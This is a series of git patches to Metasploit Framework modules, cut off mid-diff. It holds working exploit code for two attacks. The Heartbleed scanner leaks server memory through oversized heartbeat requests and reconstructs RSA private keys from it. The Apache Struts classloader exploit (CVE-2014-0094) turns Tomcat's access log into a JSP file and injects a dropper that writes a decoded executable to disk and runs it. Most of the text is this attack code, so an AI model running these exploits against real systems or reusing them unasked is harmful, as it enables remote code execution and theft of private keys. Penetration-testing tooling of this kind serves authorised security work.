insertions(+), 145 deletions(-) diff --git a/modules/auxiliary/scanner/ssl/openssl_heartbleed.rb b/modules/auxiliary/scanner/ssl/openssl_heartbleed.rb index 3cca563d4b..4109ff847d 100644 --- a/modules/auxiliary/scanner/ssl/openssl_heartbleed.rb +++ b/modules/auxiliary/scanner/ssl/openssl_heartbleed.rb @@ -3,6 +3,12 @@ # Current source: https://github.com/rapid7/metasploit-framework ## +# TODO: Connection reuse: Only connect once and send subsequent heartbleed requests. +# We tried it once in https://github.com/rapid7/metasploit-framework/pull/3300 +# but there were too many errors +# TODO: Parse the rest of the server responses and return a hash with the data +# TODO: Extract the relevant functions and include them in the framework + require 'msf/core' class Metasploit3 < Msf::Auxiliary @@ -65,9 +71,15 @@ class Metasploit3 < Msf::Auxiliary 0x00ff # Unknown ] - HANDSHAKE_RECORD_TYPE = 0x16 - HEARTBEAT_RECORD_TYPE = 0x18 - ALERT_RECORD_TYPE = 0x15 + HANDSHAKE_RECORD_TYPE = 0x16 + HEARTBEAT_RECORD_TYPE = 0x18 + ALERT_RECORD_TYPE = 0x15 + HANDSHAKE_SERVER_HELLO_TYPE = 0x02 + HANDSHAKE_CERTIFICATE_TYPE = 0x0b + HANDSHAKE_KEY_EXCHANGE_TYPE = 0x0c + HANDSHAKE_SERVER_HELLO_DONE_TYPE = 0x0e + + TLS_VERSION = { 'SSLv3' => 0x0300, '1.0' => 0x0301, @@ -141,7 +153,7 @@ class Metasploit3 < Msf::Auxiliary Opt::RPORT(443), OptEnum.new('TLS_CALLBACK', [true, 'Protocol to use, "None" to use raw TLS sockets', 'None', [ 'None', 'SMTP', 'IMAP', 'JABBER', 'POP3', 'FTP', 'POSTGRES' ]]), OptEnum.new('TLS_VERSION', [true, 'TLS/SSL version to use', '1.0', ['SSLv3','1.0', '1.1', '1.2']]), - OptInt.new('MAX_KEYTRIES', [true, 'Max tries to dump key', 10]), + OptInt.new('MAX_KEYTRIES', [true, 'Max tries to dump key', 50]), OptInt.new('STATUS_EVERY', [true, 'How many retries until status', 5]), OptRegexp.new('DUMPFILTER', [false, 'Pattern to filter leaked memory before storing', nil]), OptInt.new('RESPONSE_TIMEOUT', [true, 'Number of seconds to wait for a server response', 10]) @@ -150,11 +162,20 @@ class Metasploit3 < Msf::Auxiliary register_advanced_options( [ OptInt.new('HEARTBEAT_LENGTH', [true, 'Heartbeat length', 65535]), - OptString.new('XMPPDOMAIN', [ true, 'The XMPP Domain to use when Jabber is selected', 'localhost' ]) + OptString.new('XMPPDOMAIN', [true, 'The XMPP Domain to use when Jabber is selected', 'localhost']) ], self.class) end + def peer + "#{rhost}:#{rport}" + end + + # + # Main methods + # + + # Called when using check def check_host(ip) @check_only = true vprint_status "#{peer} - Checking for Heartbleed exposure" @@ -165,20 +186,48 @@ class Metasploit3 < Msf::Auxiliary end end + # Main method def run if heartbeat_length > 65535 || heartbeat_length < 0 - print_error("HEARTBEAT_LENGTH should be a natural number less than 65536") + print_error('HEARTBEAT_LENGTH should be a natural number less than 65536') return end if response_timeout < 0 - print_error("RESPONSE_TIMEOUT should be bigger than 0") + print_error('RESPONSE_TIMEOUT should be bigger than 0') return end super end + # Main method + def run_host(ip) + # initial connect to get public key and stuff + connect_result = establish_connect + disconnect + return if connect_result.nil? + + case action.name + when 'SCAN' + loot_and_report(bleed) + when 'DUMP' + loot_and_report(bleed) # Scan & Dump are similar, scan() records results + when 'KEYS' + getkeys + else + #Shouldn't get here, since Action is Enum + print_error("Unknown Action: #{action.name}") + end + + # ensure all connections are closed + disconnect + end + + # + # DATASTORE values + # + # If this is merely a check, set to the RFC-defined # maximum padding length of 2^14. See: # https://tools.ietf.org/html/rfc6520#section-4 @@ -187,53 +236,77 @@ class Metasploit3 < Msf::Auxiliary if @check_only SAFE_CHECK_MAX_RECORD_LENGTH else - datastore["HEARTBEAT_LENGTH"] + datastore['HEARTBEAT_LENGTH'] end end - def peer - "#{rhost}:#{rport}" - end - def response_timeout datastore['RESPONSE_TIMEOUT'] end + def tls_version + datastore['TLS_VERSION'] + end + + def dumpfilter + datastore['DUMPFILTER'] + end + + def max_keytries + datastore['MAX_KEYTRIES'] + end + + def xmpp_domain + datastore['XMPPDOMAIN'] + end + + def status_every + datastore['STATUS_EVERY'] + end + + def tls_callback + datastore['TLS_CALLBACK'] + end + + # + # TLS Callbacks + # + def tls_smtp # https://tools.ietf.org/html/rfc3207 - sock.get_once(-1, response_timeout) + get_data sock.put("EHLO #{Rex::Text.rand_text_alpha(10)}\r\n") - res = sock.get_once(-1, response_timeout) + res = get_data unless res && res =~ /STARTTLS/ return nil end sock.put("STARTTLS\r\n") - sock.get_once(-1, response_timeout) + get_data end def tls_imap # http://tools.ietf.org/html/rfc2595 - sock.get_once(-1, response_timeout) + get_data sock.put("a001 CAPABILITY\r\n") - res = sock.get_once(-1, response_timeout) + res = get_data unless res && res =~ /STARTTLS/i return nil end sock.put("a002 STARTTLS\r\n") - sock.get_once(-1, response_timeout) + get_data end def tls_postgres # postgresql TLS - works with all modern pgsql versions - 8.0 - 9.3 # http://www.postgresql.org/docs/9.3/static/protocol-message-formats.html - sock.get_once - # the postgres SSLRequest packet is a int32(8) followed by a int16(1234), + get_data + # the postgres SSLRequest packet is a int32(8) followed by a int16(1234), # int16(5679) in network format psql_sslrequest = [8].pack('N') psql_sslrequest << [1234, 5679].pack('n*') sock.put(psql_sslrequest) - res = sock.get_once + res = get_data unless res && res =~ /S/ return nil end @@ -242,14 +315,14 @@ class Metasploit3 < Msf::Auxiliary def tls_pop3 # http://tools.ietf.org/html/rfc2595 - sock.get_once(-1, response_timeout) + get_data sock.put("CAPA\r\n") - res = sock.get_once(-1, response_timeout) + res = get_data if res.nil? || res =~ /^-/ || res !~ /STLS/ return nil end sock.put("STLS\r\n") - res = sock.get_once(-1, response_timeout) + res = get_data if res.nil? || res =~ /^-/ return nil end @@ -265,13 +338,13 @@ class Metasploit3 < Msf::Auxiliary end def tls_jabber - sock.put(jabber_connect_msg(datastore['XMPPDOMAIN'])) + sock.put(jabber_connect_msg(xmpp_domain)) res = sock.get(response_timeout) if res && res.include?('host-unknown') jabber_host = res.match(/ from='([\w.]*)' /) if jabber_host && jabber_host[1] disconnect - connect + establish_connect vprint_status("#{peer} - Connecting with autodetected remote XMPP hostname: #{jabber_host[1]}...") sock.put(jabber_connect_msg(jabber_host[1])) res = sock.get(response_timeout) @@ -293,7 +366,7 @@ class Metasploit3 < Msf::Auxiliary res = sock.get(response_timeout) return nil if res.nil? sock.put("AUTH TLS\r\n") - res = sock.get_once(-1, response_timeout) + res = get_data return nil if res.nil? if res !~ /^234/ # res contains the error message @@ -303,31 +376,83 @@ class Metasploit3 < Msf::Auxiliary res end - def run_host(ip) - case action.name - when 'SCAN' - loot_and_report(bleed) - when 'DUMP' - loot_and_report(bleed) # Scan & Dump are similar, scan() records results - when 'KEYS' - getkeys() - else - #Shouldn't get here, since Action is Enum - print_error("Unknown Action: #{action.name}") - return + # + # Helper Methods + # + + # Get data from the socket + # this ensures the requested length is read (if available) + def get_data(length = -1) + + return sock.get_once(-1, response_timeout) if length == -1 + + to_receive = length + data = '' + while to_receive > 0 + temp = sock.get_once(to_receive, response_timeout) + break if temp.nil? + + data << temp + to_receive -= temp.length end + data end + def to_hex_string(data) + data.each_byte.map { |b| sprintf('%02X ', b) }.join.strip + end + + # establishes a connect and parses the server response + def establish_connect + connect + + unless tls_callback == 'None' + vprint_status("#{peer} - Trying to start SSL via #{tls_callback}") + res = self.send(TLS_CALLBACKS[tls_callback]) + if res.nil? + vprint_error("#{peer} - STARTTLS failed...") + return nil + end + end + + vprint_status("#{peer} - Sending Client Hello...") + sock.put(client_hello) + + server_hello = sock.get(response_timeout) + unless server_hello + vprint_error("#{peer} - No Server Hello after #{response_timeout} seconds...") + return nil + end + + server_resp_parsed = parse_ssl_record(server_hello) + + if server_resp_parsed.nil? + vprint_error("#{peer} - Server Hello Not Found") + return nil + end + + server_resp_parsed + end + + # Generates a heartbeat request + def heartbeat_request(length) + payload = "\x01" # Heartbeat Message Type: Request (1) + payload << [length].pack('n') # Payload Length: 65535 + + ssl_record(HEARTBEAT_RECORD_TYPE, payload) + end + + # Generates, sends and receives a heartbeat message def bleed - # This actually performs the heartbleed portion connect_result = establish_connect return if connect_result.nil? vprint_status("#{peer} - Sending Heartbeat...") - sock.put(heartbeat(heartbeat_length)) - hdr = sock.get_once(5, response_timeout) - if hdr.blank? + sock.put(heartbeat_request(heartbeat_length)) + hdr = get_data(5) + if hdr.nil? || hdr.empty? vprint_error("#{peer} - No Heartbeat response...") + disconnect return end @@ -338,33 +463,36 @@ class Metasploit3 < Msf::Auxiliary # try to get the TLS error if type == ALERT_RECORD_TYPE - res = sock.get_once(len, response_timeout) + res = get_data(len) alert_unp = res.unpack('CC') alert_level = alert_unp[0] alert_desc = alert_unp[1] - msg = "Unknown error" + # http://tools.ietf.org/html/rfc5246#section-7.2 case alert_desc when 0x46 - msg = "Protocol error. Looks like the chosen protocol is not supported." + msg = 'Protocol error. Looks like the chosen protocol is not supported.' + else + msg = 'Unknown error' end vprint_error("#{peer} - #{msg}") disconnect return end - unless type == HEARTBEAT_RECORD_TYPE && version == TLS_VERSION[datastore['TLS_VERSION']] - vprint_error("#{peer} - Unexpected Heartbeat response") + unless type == HEARTBEAT_RECORD_TYPE && version == TLS_VERSION[tls_version] + vprint_error("#{peer} - Unexpected Heartbeat response header (#{to_hex_string(hdr)})") disconnect return end - heartbeat_data = sock.get(heartbeat_length) # Read the magic length... + heartbeat_data = get_data(heartbeat_length) vprint_status("#{peer} - Heartbeat response, #{heartbeat_data.length} bytes") disconnect heartbeat_data end + # Stores received data def loot_and_report(heartbeat_data) unless heartbeat_data @@ -382,19 +510,19 @@ class Metasploit3 < Msf::Auxiliary }) if action.name == 'DUMP' # Check mode, dump if requested. - pattern = datastore['DUMPFILTER'] + pattern = dumpfilter if pattern match_data = heartbeat_data.scan(pattern).join else match_data = heartbeat_data end path = store_loot( - "openssl.heartbleed.server", - "application/octet-stream", + 'openssl.heartbleed.server', + 'application/octet-stream', rhost, match_data, nil, - "OpenSSL Heartbleed server memory" + 'OpenSSL Heartbleed server memory' ) print_status("#{peer} - Heartbeat data stored in #{path}") end @@ -403,12 +531,12 @@ class Metasploit3 < Msf::Auxiliary end - def getkeys() - unless datastore['TLS_CALLBACK'] == 'None' - print_error('TLS callbacks currently unsupported for keydumping action') #TODO - return - end + # + # Keydumoing helper methods + # + # Tries to retreive the private key + def getkeys print_status("#{peer} - Scanning for private keys") count = 0 @@ -423,13 +551,16 @@ class Metasploit3 < Msf::Auxiliary vprint_status("#{peer} - e: #{e}") print_status("#{peer} - #{Time.now.getutc} - Starting.") - datastore['MAX_KEYTRIES'].times { + max_keytries.times { # Loop up to MAX_KEYTRIES times, looking for keys - if count % datastore['STATUS_EVERY'] == 0 + if count % status_every == 0 print_status("#{peer} - #{Time.now.getutc} - Attempt #{count}...") end - p, q = get_factors(bleed, n) # Try to find factors in mem + bleedresult = bleed + return unless bleedresult + + p, q = get_factors(bleedresult, n) # Try to find factors in mem unless p.nil? || q.nil? key = key_from_pqe(p, q, e) @@ -437,75 +568,32 @@ class Metasploit3 < Msf::Auxiliary print_status(key.export) path = store_loot( - "openssl.heartbleed.server", - "text/plain", + 'openssl.heartbleed.server', + 'text/plain', rhost, key.export, nil, - "OpenSSL Heartbleed Private Key" + 'OpenSSL Heartbleed Private Key' ) print_status("#{peer} - Private key stored in #{path}") return end count += 1 } - print_error("#{peer} - Private key not found. You can try to increase MAX_KEYTRIES.") + print_error("#{peer} - Private key not found. You can try to increase MAX_KEYTRIES and/or HEARTBEAT_LENGTH.") end - def heartbeat(length) - payload = "\x01" # Heartbeat Message Type: Request (1) - payload << [length].pack("n") # Payload Length: 65535 - - ssl_record(HEARTBEAT_RECORD_TYPE, payload) - end - - def client_hello - # Use current day for TLS time - time_temp = Time.now - time_epoch = Time.mktime(time_temp.year, time_temp.month, time_temp.day, 0, 0).to_i - - hello_data = [TLS_VERSION[datastore['TLS_VERSION']]].pack("n") # Version TLS - hello_data << [time_epoch].pack("N") # Time in epoch format - hello_data << Rex::Text.rand_text(28) # Random - hello_data << "\x00" # Session ID length - hello_data << [CIPHER_SUITES.length * 2].pack("n") # Cipher Suites length (102) - hello_data << CIPHER_SUITES.pack("n*") # Cipher Suites - hello_data << "\x01" # Compression methods length (1) - hello_data << "\x00" # Compression methods: null - - hello_data_extensions = "\x00\x0f" # Extension type (Heartbeat) - hello_data_extensions << "\x00\x01" # Extension length - hello_data_extensions << "\x01" # Extension data - - hello_data << [hello_data_extensions.length].pack("n") - hello_data << hello_data_extensions - - data = "\x01\x00" # Handshake Type: Client Hello (1) - data << [hello_data.length].pack("n") # Length - data << hello_data - - ssl_record(HANDSHAKE_RECORD_TYPE, data) - end - - def ssl_record(type, data) - record = [type, TLS_VERSION[datastore['TLS_VERSION']], data.length].pack('Cnn') - record << data - end - - def get_ne() - # Fetch rhost's cert, return public key values - connect(true, {"SSL" => true}) #Force SSL - cert = OpenSSL::X509::Certificate.new(sock.peer_cert) - disconnect - - unless cert + # Returns the N and E params from the public server certificate + def get_ne + unless @cert print_error("#{peer} - No certificate found") return end - return cert.public_key.params["n"], cert.public_key.params["e"] + return @cert.public_key.params['n'], @cert.public_key.params['e'] end + # Tries to find pieces of the private key in the provided data def get_factors(data, n) # Walk through data looking for factors of n psize = n.num_bits / 8 / 2 @@ -523,40 +611,11 @@ class Metasploit3 < Msf::Auxiliary return p, q end end - } + } return nil, nil end - def establish_connect - connect - - unless datastore['TLS_CALLBACK'] == 'None' - vprint_status("#{peer} - Trying to start SSL via #{datastore['TLS_CALLBACK']}") - res = self.send(TLS_CALLBACKS[datastore['TLS_CALLBACK']]) - if res.nil? - vprint_error("#{peer} - STARTTLS failed...") - return nil - end - end - - vprint_status("#{peer} - Sending Client Hello...") - sock.put(client_hello) - - server_hello = sock.get(response_timeout) - unless server_hello - vprint_error("#{peer} - No Server Hello after #{response_timeout} seconds...") - disconnect - return nil - end - - unless server_hello.unpack("C").first == HANDSHAKE_RECORD_TYPE - vprint_error("#{peer} - Server Hello Not Found") - return nil - end - - true - end - + # Generates the private key from the P, Q and E values def key_from_pqe(p, q, e) # Returns an RSA Private Key from Factors key = OpenSSL::PKey::RSA.new() @@ -577,5 +636,170 @@ class Metasploit3 < Msf::Auxiliary return key end -end + # + # SSL/TLS packet methods + # + # Creates and returns a new SSL record with the provided data + def ssl_record(type, data) + record = [type, TLS_VERSION[tls_version], data.length].pack('Cnn') + record << data + end + + # generates a CLIENT_HELLO ssl/tls packet + def client_hello + # Use current day for TLS time + time_temp = Time.now + time_epoch = Time.mktime(time_temp.year, time_temp.month, time_temp.day, 0, 0).to_i + + hello_data = [TLS_VERSION[tls_version]].pack('n') # Version TLS + hello_data << [time_epoch].pack('N') # Time in epoch format + hello_data << Rex::Text.rand_text(28) # Random + hello_data << "\x00" # Session ID length + hello_data << [CIPHER_SUITES.length * 2].pack('n') # Cipher Suites length (102) + hello_data << CIPHER_SUITES.pack('n*') # Cipher Suites + hello_data << "\x01" # Compression methods length (1) + hello_data << "\x00" # Compression methods: null + + hello_data_extensions = "\x00\x0f" # Extension type (Heartbeat) + hello_data_extensions << "\x00\x01" # Extension length + hello_data_extensions << "\x01" # Extension data + + hello_data << [hello_data_extensions.length].pack('n') + hello_data << hello_data_extensions + + data = "\x01\x00" # Handshake Type: Client Hello (1) + data << [hello_data.length].pack('n') # Length + data << hello_data + + ssl_record(HANDSHAKE_RECORD_TYPE, data) + end + + # Parse SSL header + def parse_ssl_record(data) + ssl_records = [] + remaining_data = data + ssl_record_counter = 0 + while remaining_data && remaining_data.length > 0 + ssl_record_counter += 1 + ssl_unpacked = remaining_data.unpack('CH4n') + return nil if ssl_unpacked.nil? or ssl_unpacked.length < 3 + ssl_type = ssl_unpacked[0] + ssl_version = ssl_unpacked[1] + ssl_len = ssl_unpacked[2] + vprint_debug("SSL record ##{ssl_record_counter}:") + vprint_debug("\tType: #{ssl_type}") + vprint_debug("\tVersion: 0x#{ssl_version}") + vprint_debug("\tLength: #{ssl_len}") + if ssl_type != HANDSHAKE_RECORD_TYPE + vprint_debug("\tWrong Record Type! (#{ssl_type})") + else + ssl_data = remaining_data[5, ssl_len] + handshakes = parse_handshakes(ssl_data) + ssl_records << { + :type => ssl_type, + :version => ssl_version, + :length => ssl_len, + :data => handshakes + } + end + remaining_data = remaining_data[(ssl_len + 5)..-1] + end + + ssl_records + end + + # Parse Handshake data returned from servers + def parse_handshakes(data) + # Can contain multiple handshakes + remaining_data = data + handshakes = [] + handshake_count = 0 + while remaining_data && remaining_data.length > 0 + hs_unpacked = remaining_data.unpack('CCn') + next if hs_unpacked.nil? or hs_unpacked.length < 3 + hs_type = hs_unpacked[0] + hs_len_pad = hs_unpacked[1] + hs_len = hs_unpacked[2] + hs_data = remaining_data[4, hs_len] + handshake_count += 1 + vprint_debug("\tHandshake ##{handshake_count}:") + vprint_debug("\t\tLength: #{hs_len}") + + handshake_parsed = nil + case hs_type + when HANDSHAKE_SERVER_HELLO_TYPE + vprint_debug("\t\tType: Server Hello (#{hs_type})") + handshake_parsed = parse_server_hello(hs_data) + when HANDSHAKE_CERTIFICATE_TYPE + vprint_debug("\t\tType: Certificate Data (#{hs_type})") + handshake_parsed = parse_certificate_data(hs_data) + when HANDSHAKE_KEY_EXCHANGE_TYPE + vprint_debug("\t\tType: Server Key Exchange (#{hs_type})") + # handshake_parsed = parse_server_key_exchange(hs_data) + when HANDSHAKE_SERVER_HELLO_DONE_TYPE + vprint_debug("\t\tType: Server Hello Done (#{hs_type})") + else + vprint_debug("\t\tType: Handshake type #{hs_type} not implemented") + end + + handshakes << { + :type => hs_type, + :len => hs_len, + :data => handshake_parsed + } + remaining_data = remaining_data[(hs_len + 4)..-1] + end + + handshakes + end + + # Parse Server Hello message + def parse_server_hello(data) + version = data.unpack('H4')[0] + vprint_debug("\t\tServer Hello Version: 0x#{version}") + random = data[2,32].unpack('H*')[0] + vprint_debug("\t\tServer Hello random data: #{random}") + session_id_length = data[34,1].unpack('C')[0] + vprint_debug("\t\tServer Hello Session ID length: #{session_id_length}") + session_id = data[35,session_id_length].unpack('H*')[0] + vprint_debug("\t\tServer Hello Session ID: #{session_id}") + # TODO Read the rest of the server hello (respect message length) + + # TODO: return hash with data + true + end + + # Parse certificate data + def parse_certificate_data(data) + # get certificate data length + unpacked = data.unpack('Cn') + cert_len_padding = unpacked[0] + cert_len = unpacked[1] + vprint_debug("\t\tCertificates length: #{cert_len}") + # contains multiple certs + already_read = 3 + cert_counter = 0 + while already_read < cert_len + start = already_read + cert_counter += 1 + # get single certificate length + single_cert_unpacked = data[start, 3].unpack('Cn') + single_cert_len_padding = single_cert_unpacked[0] + single_cert_len = single_cert_unpacked[1] + vprint_debug("\t\tCertificate ##{cert_counter}:") + vprint_debug("\t\t\tCertificate ##{cert_counter}: Length: #{single_cert_len}") + certificate_data = data[(start + 3), single_cert_len] + cert = OpenSSL::X509::Certificate.new(certificate_data) + # First received certificate is the one from the server + @cert = cert if @cert.nil? + #vprint_debug("Got certificate: #{cert.to_text}") + vprint_debug("\t\t\tCertificate ##{cert_counter}: #{cert.inspect}") + already_read = already_read + single_cert_len + 3 + end + + # TODO: return hash with data + true + end + +end From 140c8587e75fc135f98bbe7e79df8104e2ff8332 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Thu, 1 May 2014 15:24:10 -0500 Subject: [PATCH 228/853] Fix metadata --- .../http/struts_code_exec_classloader.rb | 43 +++++++++---------- 1 file changed, 21 insertions(+), 22 deletions(-) diff --git a/modules/exploits/multi/http/struts_code_exec_classloader.rb b/modules/exploits/multi/http/struts_code_exec_classloader.rb index ad279627f4..df8dc3fdd7 100644 --- a/modules/exploits/multi/http/struts_code_exec_classloader.rb +++ b/modules/exploits/multi/http/struts_code_exec_classloader.rb @@ -32,41 +32,40 @@ class Metasploit3 < Msf::Exploit::Remote 'License' => MSF_LICENSE, 'References' => [ - [ 'CVE', '2014-0094'], - [ 'CVE', '2014-0112'], - [ 'URL', 'http://www.pwntester.com/blog/2014/04/24/struts2-0day-in-the-wild/'], - [ 'URL', 'http://struts.apache.org/release/2.3.x/docs/s2-020.html'] + ['CVE', '2014-0094'], + ['CVE', '2014-0112'], + ['URL', 'http://www.pwntester.com/blog/2014/04/24/struts2-0day-in-the-wild/'], + ['URL', 'http://struts.apache.org/release/2.3.x/docs/s2-020.html'] ], - 'Platform' => %w{ linux win }, - 'Privileged' => true, + 'Platform' => %w{ linux win }, 'Targets' => [ - ['Windows Universal', + ['Java', + { + 'Arch' => ARCH_JAVA, + 'Platform' => %w{ linux win } + }, + ], + ['Linux', + { + 'Arch' => ARCH_X86, + 'Platform' => 'linux' + } + ], + ['Windows', { - 'Arch' => ARCH_X86, + 'Arch' => ARCH_X86, 'Platform' => 'win' } - ], - ['Linux Universal', - { - 'Arch' => ARCH_X86, - 'Platform' => 'linux' - } - ], - ['Java Universal', - { - 'Arch' => ARCH_JAVA, - 'Platform' => ['win','linux'] - }, ] ], 'DisclosureDate' => 'Mar 06 2014', - 'DefaultTarget' => 2)) + 'DefaultTarget' => 0)) register_options( [ Opt::RPORT(8080), - OptString.new('TARGETURI', [ true, 'The path to a struts application action', "/hello_world/hello.action"]) + OptString.new('TARGETURI', [ true, 'The path to a struts application action', "/struts2-blank/example/HelloWorld.action"]) ], self.class) end From 195005dd832e1a796565753bc2351d706d0baa62 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Thu, 1 May 2014 15:25:55 -0500 Subject: [PATCH 229/853] Do minor style changes --- .../multi/http/struts_code_exec_classloader.rb | 14 ++++++-------- 1 file changed, 6 insertions(+), 8 deletions(-) diff --git a/modules/exploits/multi/http/struts_code_exec_classloader.rb b/modules/exploits/multi/http/struts_code_exec_classloader.rb index df8dc3fdd7..82322a7113 100644 --- a/modules/exploits/multi/http/struts_code_exec_classloader.rb +++ b/modules/exploits/multi/http/struts_code_exec_classloader.rb @@ -72,20 +72,18 @@ class Metasploit3 < Msf::Exploit::Remote def exec_cmd(uri, cmd = "") resp = send_request_cgi({ - 'uri' => uri+cmd, - 'version' => '1.1', - 'method' => 'GET', + 'uri' => uri+cmd, + 'version' => '1.1', + 'method' => 'GET', }) return resp end - - def is_log_flushed(resp, content) - return (resp.headers["Content-Length"] != "0") && (resp.body =~ /#{content}/) + def is_log_flushed?(resp, content) + return resp.headers["Content-Length"] != "0" && resp.body =~ /#{content}/ end - def exploit prefix_jsp = rand_text_alphanumeric(3+rand(3)) @@ -181,7 +179,7 @@ class Metasploit3 < Msf::Exploit::Remote fail_with(Failure::TimeoutExpired, "Not received response") if res.nil? # Success if the server has flushed all the sent commands to the jsp file - if res.code == 200 && is_log_flushed(res, payload_file) + if res.code == 200 && is_log_flushed?(res, payload_file) flushed = true break end From b7ecf829d3c28d7f63b7fa8a8db91d907bb5d200 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Thu, 1 May 2014 16:39:53 -0500 Subject: [PATCH 230/853] Do first refactor --- .../http/struts_code_exec_classloader.rb | 103 +++++++++++------- 1 file changed, 64 insertions(+), 39 deletions(-) diff --git a/modules/exploits/multi/http/struts_code_exec_classloader.rb b/modules/exploits/multi/http/struts_code_exec_classloader.rb index 82322a7113..1aa80f25fb 100644 --- a/modules/exploits/multi/http/struts_code_exec_classloader.rb +++ b/modules/exploits/multi/http/struts_code_exec_classloader.rb @@ -6,7 +6,7 @@ require 'msf/core' class Metasploit3 < Msf::Exploit::Remote - Rank = ExcellentRanking + Rank = GreatRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::EXE @@ -66,30 +66,45 @@ class Metasploit3 < Msf::Exploit::Remote [ Opt::RPORT(8080), OptString.new('TARGETURI', [ true, 'The path to a struts application action', "/struts2-blank/example/HelloWorld.action"]) - ], self.class) + ], self.class) end + def jsp_dropper(file, exe) + dropper = <<-eos +<%@ page import=\"java.io.FileOutputStream\" %> +<%@ page import=\"sun.misc.BASE64Decoder\" %> +<%@ page import=\"java.io.File\" %> +<% FileOutputStream oFile = new FileOutputStream(\"#{file}\", false); %> +<% oFile.write(new sun.misc.BASE64Decoder().decodeBuffer(\"#{Rex::Text.encode_base64(exe)}\")); %> +<% oFile.flush(); %> +<% oFile.close(); %> +<% File f = new File(\"#{file}\"); %> +<% f.setExecutable(true); %> +<% Runtime.getRuntime().exec(\"./#{file}\"); %> + eos + + dropper + end def exec_cmd(uri, cmd = "") - resp = send_request_cgi({ + res = send_request_cgi({ 'uri' => uri+cmd, 'version' => '1.1', 'method' => 'GET', }) - return resp + res end def is_log_flushed?(resp, content) return resp.headers["Content-Length"] != "0" && resp.body =~ /#{content}/ end - def exploit - + def modify_class_loader prefix_jsp = rand_text_alphanumeric(3+rand(3)) date_format = rand_text_numeric(1+rand(4)) - vprint_status("#{peer} - Modifying class loader") + print_status("#{peer} - Modifying class loader") # Modifies classLoader parameters exec_cmd("#{datastore['TARGETURI']}?class['classLoader'].resources.context.parent.pipeline.first.directory=webapps/ROOT") # Directory where log file os going to be created @@ -97,13 +112,13 @@ class Metasploit3 < Msf::Exploit::Remote exec_cmd("#{datastore['TARGETURI']}?class['classLoader'].resources.context.parent.pipeline.first.suffix=.jsp") # File extension exec_cmd("#{datastore['TARGETURI']}?class['classLoader'].resources.context.parent.pipeline.first.fileDateFormat=#{date_format}") # second part of filename: "prefix+fileDateFormat.suffix" - jsp_file = prefix_jsp - jsp_file << date_format - jsp_file << ".jsp" + @jsp_file = prefix_jsp + @jsp_file << date_format + @jsp_file << ".jsp" # Wait till the log is created uri = "/" - uri << jsp_file + uri << @jsp_file created = false @@ -117,52 +132,59 @@ class Metasploit3 < Msf::Exploit::Remote res = exec_cmd(uri) # Failure. The request timed out or the server went away. - fail_with(Failure::TimeoutExpired, "Not received response") if res.nil? + fail_with(Failure::TimeoutExpired, "#{peer} - Not received response") if res.nil? # Success if the server has flushed all the sent commands to the jsp file if res.code == 200 - vprint_good("#{peer} - created file at http://#{peer}/#{jsp_file}") + print_good("#{peer} - Log file created file at http://#{peer}/#{@jsp_file}") created = true break end end - fail_with(Failure::TimeoutExpired, "No log file was created") unless created + fail_with(Failure::TimeoutExpired, "#{peer} - No log file was created") unless created + end + # Fix the JSP payload to make it valid once is dropped + # to the log file + def fix(jsp) + output = "" + jsp.each_line do |l| + if l =~ /<%.*%>/ + output << l + elsif l =~ /<%/ + next + elsif l.chomp.empty? + next + else + output << "<% #{l.chomp} %>" + end + end + output + end + + def execute_jsp if target['Arch'] == ARCH_JAVA - payload_exe = payload.encoded + jsp = fix(payload.encoded) + register_files_for_cleanup("#{@jsp_file}") else payload_exe = generate_payload_exe + payload_file = rand_text_alphanumeric(4 + rand(4)) + jsp = jsp_dropper(payload_file, payload_exe) + register_files_for_cleanup("#{payload_file}", "#{@jsp_file}") end - payload_file = rand_text_alphanumeric(4+rand(4)) - payload_file << ".jsp" if (target['Arch'] == ARCH_JAVA) - register_files_for_cleanup("#{payload_file}", "#{jsp_file}") - # Inexistent URI that logs on previously created log file (with ".jsp" suffix) - uri = String.new(datastore['TARGETURI']) - uri << payload_file - - vprint_status("#{peer} - Dumping payload into the logfile") + hint = rand_text_alpha(4 + rand(4)) + print_status("#{peer} - Dumping payload into the logfile") # Commands to be logged - exec_cmd(uri, "<%@ page import=\"java.io.FileOutputStream\" %>") - exec_cmd(uri, "<%@ page import=\"sun.misc.BASE64Decoder\" %>") - exec_cmd(uri, "<%@ page import=\"java.io.File\" %>") - - exec_cmd(uri, "<% FileOutputStream oFile = new FileOutputStream(\"#{payload_file}\", false); %>") - exec_cmd(uri, "<% oFile.write(new sun.misc.BASE64Decoder().decodeBuffer(\"#{Rex::Text.encode_base64(payload_exe)}\")); %>") - exec_cmd(uri, "<% oFile.flush(); %>") - exec_cmd(uri, "<% oFile.close(); %>") - - if target['Arch'] != ARCH_JAVA - exec_cmd(uri, "<% File f = new File(\"#{payload_file}\"); %>") - exec_cmd(uri, "<% f.setExecutable(true); %>") - exec_cmd(uri, "<% Runtime.getRuntime().exec(\"./#{payload_file}\"); %>") + jsp.each_line do |l| + exec_cmd(hint, l.chomp) end uri = "/" - uri << jsp_file + uri << @jsp_file flushed = false @@ -179,16 +201,19 @@ class Metasploit3 < Msf::Exploit::Remote fail_with(Failure::TimeoutExpired, "Not received response") if res.nil? # Success if the server has flushed all the sent commands to the jsp file - if res.code == 200 && is_log_flushed?(res, payload_file) + if res.code == 200 && is_log_flushed?(res, hint) flushed = true break end end fail_with(Failure::TimeoutExpired, "Log not flushed on time") unless flushed + end - exec_cmd("/#{payload_file}") if (target['Arch'] == ARCH_JAVA) + def exploit + modify_class_loader + execute_jsp end end From 3dd3ceb3a91e20d808fb71fb1d1d283347354f8b Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Thu, 1 May 2014 18:04:37 -0500 Subject: [PATCH 231/853] Refactor code --- .../http/struts_code_exec_classloader.rb | 150 ++++++++++-------- 1 file changed, 80 insertions(+), 70 deletions(-) diff --git a/modules/exploits/multi/http/struts_code_exec_classloader.rb b/modules/exploits/multi/http/struts_code_exec_classloader.rb index 1aa80f25fb..d44e390350 100644 --- a/modules/exploits/multi/http/struts_code_exec_classloader.rb +++ b/modules/exploits/multi/http/struts_code_exec_classloader.rb @@ -6,7 +6,7 @@ require 'msf/core' class Metasploit3 < Msf::Exploit::Remote - Rank = GreatRanking + Rank = ManualRanking # It's going to manipulate the Class Loader include Msf::Exploit::Remote::HttpClient include Msf::Exploit::EXE @@ -38,6 +38,11 @@ class Metasploit3 < Msf::Exploit::Remote ['URL', 